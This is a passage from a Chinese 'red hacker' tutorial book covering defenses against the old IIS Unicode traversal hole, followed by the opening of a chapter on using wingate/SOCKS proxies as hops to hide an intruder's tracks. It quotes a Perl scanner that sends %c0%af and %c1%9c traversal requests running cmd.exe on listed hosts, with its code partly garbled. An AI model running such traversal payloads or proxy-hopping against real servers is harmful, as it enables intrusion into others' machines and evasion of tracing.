30天打造专业红客-第章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！


　　　　这样入侵者就可以将黑页从另外一个空间下载到目标主机上，copy　过去覆盖就可以了。
　　　　这样入侵者不受地方的限制，随便什么地方了，比如网吧。
　　　　（四）unicode　漏洞的防护措施
　　　　说了那么多，现在该转入正题了，下面我来说说防范的措施，这也是从攻击中总结出来
　　　　的一些措施，希望对大家有帮助。
　　　　1、打上最新补丁
　　　　作为一个网络管理员，为了服务器的安全，需要不停的打上最新补丁，这是比较有效的
　　　　方法。但你要记住：在网络上；没有绝对的安全的，道高一尺；魔高一丈；完全相信防火墙和系
　　　　统补丁往往是很愚蠢的。
　　　　2、冷酷到底，拒人于千里之外
　　　　相信到现在还利用unicode　漏洞入侵的人都是些新手傻瓜们！他们没有确定的入侵目标，
　　　　只是抓个扫描器来乱扫一通，扫到就黑，扫不到就哭的那种。对付扫描器扫出未知的漏洞，
　　　　这是管理员的聪明之处。如何躲过扫描器的眼睛呢？请先看看下面一个用perl　写的扫描器代
　　　　码吧：
　　　　#！/usr/bin/perl
　　　　#Root　Shell　Hackers
　　　　#piffy
　　　　#this　is　a　quick　scanner　i　threw　together　while　supposedly　doing　homework　in　my　room。
　　　　#it　will　go　through　a　list　of　sites　and　check　if　it　gives　a　directory　listing　for　the　new　IIS　hole
　　　　#it　checks　for　both　％c0％af　and　％c1％9c　（其他版本的请修改这样的字符）
　　　　#perhaps　a　public　script　to　do　some　evil　stuff　with　this　exploit　later。。。　h0h0h0
　　　　#werd：　all　of　rsh；　0x7f；　hackweiser；　rain　forest　puppy　for　researching　the　hole　=＇
　　　　use　strict；
　　　　use　LWP：：UserAgent；
　　　　use　HTTP：：Request；
　　　　use　HTTP：：Response；
　　　　my　def　=　new　LWP：：UserAgent；
　　　　my　@host；
　　　　print　〃root　shell　hackersn〃；
　　　　print　〃iis　cmd　hole　scannern〃；
　　　　print　〃coded　by　piffyn〃；
　　　　print　〃nWhat　file　contains　the　hosts：　〃；
　　　　chop　（my　hosts=）；
　　　　open（IN；　hosts）　｜｜　die　〃nCould　not　open　hosts：　！〃；
　　　　while　（）
　　　　｛
　　　　host＇a＇　=　_；
　　　　chomp　host＇a＇；
　　　　a＋＋；
　　　　b＋＋；
　　　　｝
　　　　close（IN）；
　　　　a　=　0；
　　　　print　〃ph34r；　scan　started〃；
　　　　while　（a　《　b）
　　　　｛
　　　　my　url=〃host＇a＇/scripts/。。％c0％af。。/winnt/system32/cmd。exe？/c＋dir＋c：　〃；
　　　　my　request　=　new　HTTP：：Request（'GET'；　url）；
　　　　my　response　=　def…》request（request）；
　　　　if　（response…》is_success）　｛
　　　　print　response…》content；
　　　　open（OUT；　〃》》scaniis。log〃）；
　　　　print　OUT　〃nhost＇a＇　：　response…》content〃；
　　　　…close　OUT；
　　　　｝　else　｛
　　　　print　response…》error_as_HTML；
　　　　｝
　　　　&second（）
　　　　｝
　　　　sub　second（）　｛
　　　　my　url2=〃host＇a＇/scripts/。。％c1％9c。。/winnt/system32/cmd。exe？/c＋dir＋c：　〃；
　　　　my　request　=　new　HTTP：：Request（'GET'；　url2）；
　　　　my　response　=　def…》request（request）；
　　　　if　（response…》is_success）　｛
　　　　print　response…》content；
　　　　open（OUT；　〃》》scaniis。log〃）；
　　　　print　OUT　〃nhost＇a＇　：　response…》content〃；
　　　　…close　OUT；
　　　　｝　else　｛
　　　　print　response…》error_as_HTML；
　　　　｝
　　　　a＋＋；
　　　　｝
　　　　代码摘自绿盟。
　　　　不知道大家注意到上面长长的两行url　和url2　了没有，其实只是简单的字符串处理而
　　　　已。于是有以下几种方法避过扫描器的扫描：
　　　　①更改winnt　目录名
　　　　安装winnt　或者win2000　时，缺省目录是c：winnt。可以把这个目录名改成别的目录名，
　　　　这样扫描器递交〃host＇a＇/scripts/。。％c1％9c。。/winnt/system32/cmd。exe？/c＋dir＋c：”类似的
　　　　url　时就会返回〃找不到该页〃的信息。这样大部分扫描器就成失灵了。（不知道小榕的流光能
　　　　不能躲得过，但大部分的用perl　写的扫描器经这样改了之后都不起作用了）。
　　　　安装前就可以这样；但是已经安装了，确实不想改winnt/2000　的目录怎么办呢？那好；可以
　　　　看看下边的：
　　　　②更改cmd。exe　和各常用命令的名称
　　　　更改cmd。exe　的名称也可以达到同样的效果，而且更加可*，假如你只更改winnt/win2000
　　　　所在的目录名的话，别人猜对后仍然可以黑掉你。同时把一些不常用的而且有危害的命令改
　　　　成只有你知道的名字；①和②结合的话更完美！
　　　　③改变web　目录位置
　　　　通常主页所在的位置是在C：InetPubwwwroot　里。在c：inetpub　里有scripts　之类的目录。
　　　　如果你不需要他们的话，你可以把web　目录转移到别的分区，比如e：netroot　然后把C：inetpub
　　　　整个删除掉。日本有一台主机就做的比较好；它的机器明明存在有unicode　漏洞；但将web　目录
　　　　转移到d　盘；并且d　盘是不可写的；有位新手在QQ　上向我抱怨说：〃老大！你说的方法不行呀；
　　　　我黑不了！呜呜呜~~〃；哈！象这样；一般的人就难以修改主页了；（注意：这只能防止一般的人；高
　　　　手只要动动脑筋；照样能黑掉！）。
　　　　④停止不必要的服务
　　　　在internet　服务器中；为了系统的安全；您必须停掉所有的缺省web　目录的服务。然后统统
　　　　删掉，只保留你所要的；以免招来后患。
　　　　⑤改变服务的端口号
　　　　在保证不影响访问率的情况下；我们可以把web　服务的端口由80　改成别的，比如108。
　　　　因为很多还是利用unicode　漏洞攻击的人一般都是新手；他们都是拿一个扫描工具扫一个ip
　　　　段的；这样做就可以躲避那种扫描一段网段的攻击者的扫描了。（注意：此方法只能防止这种方
　　　　式的扫描；别有用心的攻击者照样可以通过修改扫描器的插件来实行扫描的。但受攻击的可能
　　　　性已经减低。）
　　　　3、限制iusr_server　的权限
　　　　上面所说的措施是把攻击者拒绝于门外，如果真的很不幸，给攻击者找到门上来了，那
　　　　不是死定了？不一定！攻击者利用UNICODE　漏洞遍历目录时的用户权限是决定于
　　　　iusr_server　的权限的，而通常iusr_server　是属于guest　组的。我们只要进一步限制iusr_server
　　　　的权限还有可能挽回（对于高手们就不一定这么说了）。
　　　　建议如下：采用NTFS　格式的文件系统，将web　目录外所有的访问权限设置为：用户
　　　　iusr_server　不可访问！注意：不要给iusr_server　对web　目录有写权限！理由是什么大家都很
　　　　清楚！你的主页就是给这样的家伙给黑的，如果他没有写的权限，就象那台日本的主机一样，
　　　　一般的新手们就难以下手了。（但是，那些确实是非写不可的地方，如：聊天室或论坛，是
　　　　可以适当放开的）。
　　　　4、偷吃成功，寻找蛛丝马迹
　　　　这就是分析访问日志，一名合格的管理员，应该有经常查看日志的好习惯。日志是非常的
　　　　多的；看起来很麻烦；但对于unicode　漏洞的攻击；只要查看分析web　服务的访问日志就可以
　　　　了。扫描器的扫描和已经攻击完了的动作都会被记录下来；要注意特别留意出现的〃cmd。exe〃
　　　　字眼。
　　　　最后；我建议：
　　　　①管理好你的admin　帐户和密码
　　　　因为现在的黑客新手们虽然是冲着unicode　漏洞而来；但他们的师父们往往推荐他们用小
　　　　榕的流光；这是一个强大的漏洞扫描工具。在扫描的过程中；脆弱的管理员帐户和密码（如：帐
　　　　户：admin　密码：1234）很容易被猜中；给他们带来了以外的收获。无论怎么强大；流光也是*黑
　　　　客字典来暴力破解的；只要你密码复杂就可以避免猜中。长度最好超过8　位；大小写和复杂字符
　　　　同时出现；如：g&Al#e7　这样的密码就很难被猜中；当然；也许我这是废话。现在出现弱口令的机会是不多了
　　　　②经常更改管理员的密码
　　　　保证只有你自己一个用户出现在管理员组；经常检查有没有可疑的用户。一般的新手都是
　　　　学着别人教的招数；在管理员组里增加一个用户；留作后门。从入侵的角度来说；这是很危险的
　　　　做法；但作为管理员不可能没有发现的；（那要看管理员的素质如何了）。　
　　　　＇第17天＇跳板的故事
　　　　跳板，这里的不是指跳水的扳子（废话），我想大家多跳板都应该有个基本的认识：就是通过这个东西跳过什么东西，掩盖什么东西。就是隐藏你的足迹，想要找出你，就必须连接x个你所通过的机器，并且找出他们的log，如果碰巧有一个没有记录，线就断了：），即使都记录了，log里面登记的IP也是上一级跳板主机的IP…
　　　　当然跳板还可以用于：
　　　　。QQ或者ICQ
　　　　。　ftp客户端
　　　　。　mail客户端
　　　　。　telnet客户端
　　　　。　端口扫描器
　　　　。　（以及几乎所有在网络中所使用的工具）
　　　　想想如果不要跳板我们不是很危险吗？
　　　　这可能不适用于某些IRC服务器，因为它们常常查看打开着的wingates及proxies。
　　　　先说简单的windows下的sock代理怎么做
　　　　一。找一些运行wingate的主机
　　　　原因：因为wingates的默认安装打开端口1080并且不记录socks连接。
　　　　怎么找这些机子呢？你可以用‘代理猎手’，好象中国人都用这个，国外人好象喜欢用wingatescan，或是从这里可以找到最新的：cyberarmy/lists/wingate（国外的，我建议